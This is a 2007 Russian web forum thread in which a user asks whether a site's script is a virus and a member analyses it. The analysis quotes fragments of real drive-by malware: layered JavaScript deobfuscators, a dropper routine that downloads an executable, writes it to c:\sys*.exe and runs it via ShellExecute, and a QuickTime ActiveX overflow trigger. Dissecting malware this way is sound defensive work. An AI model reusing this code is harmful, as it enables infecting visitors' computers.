ReSQL.ru
     
powered by simpleCommunicator - 2.0.59     © 2025 Programmizd 02
Мобильная версия    Контакт    Правила    FAQ    Помощь
Целевая тема:
Создать новую тему:
Автор:
Закрыть
Цитировать
Доб. в избранное | Игнор. тему | Прикреп. тему | Пометить прочит. / непрочит. | Фильтр
Форумы / HTML, JavaScript, VBScript, CSS [игнор отключен] [закрыт для гостей] / вирус или нет
11 сообщений из 11, страница 1 из 1
вирус или нет
    #34627470
alex_1234
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
alex_1234
Гость
Случайно зашел на сайт megazo.org и комп стал что-то усиленно читать на винте. Закрыл браузер - все прекратилось. Сейчас пытаюсь понять, что это было. Там какой-то непонятный скрипт - megazo.org/mp/index.php. Кто понимает, объясните, что это.
...
Рейтинг: 0 / 0
28.06.2007, 23:39
| Ответить | Цитировать | Написать  
вирус или нет
    #34628137
Фотография Antonariy
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Antonariy
Участник
Очень интересный пример обфускации - рекурсивный. Исполняемый код завернут в несколько слоев. Респект, однако. Первый слой:
Код: plaintext
1.
2.
3.
4.
5.
6.
<script>
function zX(s)
{
var s1=unescape( s.substr( 0 ,s.length- 1 ));
var t='';for(i= 0 ;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length- 1 , 1 ));
document.write(unescape(t));}
</script>
Это по-любому не праздничная открытка.
...
Рейтинг: 0 / 0
29.06.2007, 11:15
| Ответить | Цитировать | Написать  
вирус или нет
    #34628624
Фотография Antonariy
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Antonariy
Участник
Не, не айс. Скрипт показался умнее, чем он есть на самом деле.
Там на самом деле два куска - Первый начинается с "document.write( unescape('%3C%7" - это расшифровка дефускатора (функция zX(s)), второй - собственно ее вызов - "zX('%2A8Hxhwnuy".
...
Рейтинг: 0 / 0
29.06.2007, 13:15
| Ответить | Цитировать | Написать  
вирус или нет
    #34628742
Фотография Antonariy
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Antonariy
Участник
Функция zX в свою очередь вытаскивает еще один дефускатор:
Код: plaintext
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
function dc(x){
	var l=x.length,i,j,r,b=( 2048 / 2 ),p= 0 ,s= 0 ,w= 0 ; 
	t=Array( 63 , 36 , 2 , 11 , 42 , 0 , 13 , 56 , 43 , 60 , 0 , 0 , 0 , 0 , 0 , 0 , 31 , 38 , 34 , 22 , 16 , 35 , 57 , 51 , 62 , 55 , 32 , 21 , 41 , 40 , 39 , 37 , 3 , 20 , 28 , 46 , 8 , 15 , 54 , 14 , 24 , 23 , 61 , 0 , 0 , 0 , 0 , 17 , 0 , 44 , 26 , 19 , 4 , 5 , 25 , 50 , 59 , 49 , 6 , 29 , 30 , 10 , 1 , 12 , 53 , 58 , 45 , 9 , 47 , 27 , 48 , 7 , 18 , 52 , 33  );
	for(j= Math.ceil(l/b);j> 0 ;j--){
		r=''; 
		for(i=Math.min(l,b);i> 0 ;  i--,l--){
			w|=(t[ x.charCodeAt(p++)- 48 ])<<s;
			if(s){
				r+=String.fromCharCode( 235 ^w& 255 );
				w>>= 8 ;
				s-= 2 
			}else{
				s= 6 
			}
		}document.write2(r )
	}
}
Он потом соответственно вызывается с параметром и уже конкретно гадит:
Код: plaintext
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
	if (v[ 0 ] && v[ 1 ] && v[ 2 ]) {
		var data = XMLHttpDownload(v[ 0 ], urlRealExe);
		if (data !=  0 ) {
			var name = "c:\\sys"+GetRandString( 4 )+".exe";
			if (ADOBDStreamSave(v[ 1 ], name, data) ==  1 ) {
				if (ShellExecute(v[ 2 ], name, n) ==  1 ) {
					ret= 1 ;
				}
			}
		}
	}
Таки да, это если не вирус, то троян однозначно.
Так же пытается воспользоваться какой-то дырой в квиктайме, протащив предварительно файл:
Код: plaintext
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
function startOverflow(num)
{
	if (num ==  0 ) {
		try {
			var qt = new ActiveXObject('QuickTime.QuickTime');		
			if (qt) {
				var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="1" height="1" style="border:0px">'+
				'<param name="src" value="qt.php">'+
				'<param name="autoplay" value="true">'+
				'<param name="loop" value="false">'+
				'<param name="controller" value="true">'+
				'</object>';
				if (! mem_flag) makeSlide();
				document.getElementById('mydiv').innerHTML = qthtml;
				num =  255 ;
			}
		} catch(e) { }

		if (num =  255 ) setTimeout("startOverflow(1)",  2000 );
		else startOverflow( 1 );
...
Рейтинг: 0 / 0
29.06.2007, 13:46
| Ответить | Цитировать | Написать  
вирус или нет
    #34628821
Фотография Хрюхрюшкин.
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Хрюхрюшкин.
Участник
FF молча закрывается. Значит и его пробивает...
...
Рейтинг: 0 / 0
29.06.2007, 14:07
| Ответить | Цитировать | Написать  
вирус или нет
    #34628843
Фотография Antonariy
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Antonariy
Участник
Ты сходил по адресу? Безумству храбрых поем мы песню. =))
...
Рейтинг: 0 / 0
29.06.2007, 14:12
| Ответить | Цитировать | Написать  
вирус или нет
    #34628881
Фотография Хрюхрюшкин.
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Хрюхрюшкин.
Участник
AntonariyТы сходил по адресу? Безумству храбрых поем мы песню. =))
А зачем у меня стоят файрволл и антивирус? :)
...
Рейтинг: 0 / 0
29.06.2007, 14:21
| Ответить | Цитировать | Написать  
вирус или нет
    #34629020
alex_1234
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
alex_1234
Гость
Я в скриптах не сильно понимаю. Antonariy, ты лучше объясни, что он у меня на компе делал.
...
Рейтинг: 0 / 0
29.06.2007, 14:52
| Ответить | Цитировать | Написать  
вирус или нет
    #34629034
Фотография Antonariy
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Antonariy
Участник
Файрволл в данном случае не поможет - скрипт ходит в сеть от имени броузера по http-портам, а антивирус может не распознать какую-нибудь самоделку. Хотя файрволл защитит от действий уже просочившегося трояна. А от дыры в квиктайме не спасет ни то ни другое. Только его отсутствие =)
...
Рейтинг: 0 / 0
29.06.2007, 14:55
| Ответить | Цитировать | Написать  
вирус или нет
    #34629041
Фотография Antonariy
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Antonariy
Участник
alex_1234
Внедрялся. Удалось или нет - не знаю. Какими функциями обладает - тоже.
...
Рейтинг: 0 / 0
29.06.2007, 14:57
| Ответить | Цитировать | Написать  
вирус или нет
    #34629295
Фотография Хрюхрюшкин.
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Хрюхрюшкин.
Участник
AntonariyФайрволл в данном случае не поможет - скрипт ходит в сеть от имени броузера по http-портам, а антивирус может не распознать какую-нибудь самоделку. Хотя файрволл защитит от действий уже просочившегося трояна. А от дыры в квиктайме не спасет ни то ни другое. Только его отсутствие =)
Я про то-же.
Пусть просачиваются, там разберемся :)
P.S. Квиктайма не было никогда. Нафик он нужен? :)
...
Рейтинг: 0 / 0
29.06.2007, 16:06
| Ответить | Цитировать | Написать  
11 сообщений из 11, страница 1 из 1
Форумы / HTML, JavaScript, VBScript, CSS [игнор отключен] [закрыт для гостей] / вирус или нет
Найденые пользователи ...
Разблокировать пользователей ...
Читали тему (0):
Читали форум (0):
Пользователи онлайн (0):
Польз. соглашение
NoSQL.ru       Новости, Чат       Фотоальбом: Участники, Встречи
Закрыть
start [/forum/topic.php?fid=22&msg=34629034&tid=1458039]:
 0ms
get settings:
 6ms
get forum list:
 13ms
check forum access:
 3ms
check topic access:
 3ms
track hit:
 65ms
get topic data:
 11ms
get forum data:
 3ms
get page messages:
 54ms
get tp. blocked users:
 2ms
others: 13ms
total:  173ms
созд. / загр.: 173ms
x
x
Закрыть


Просмотр
0 / 0
Close
Debug Console [Select Text]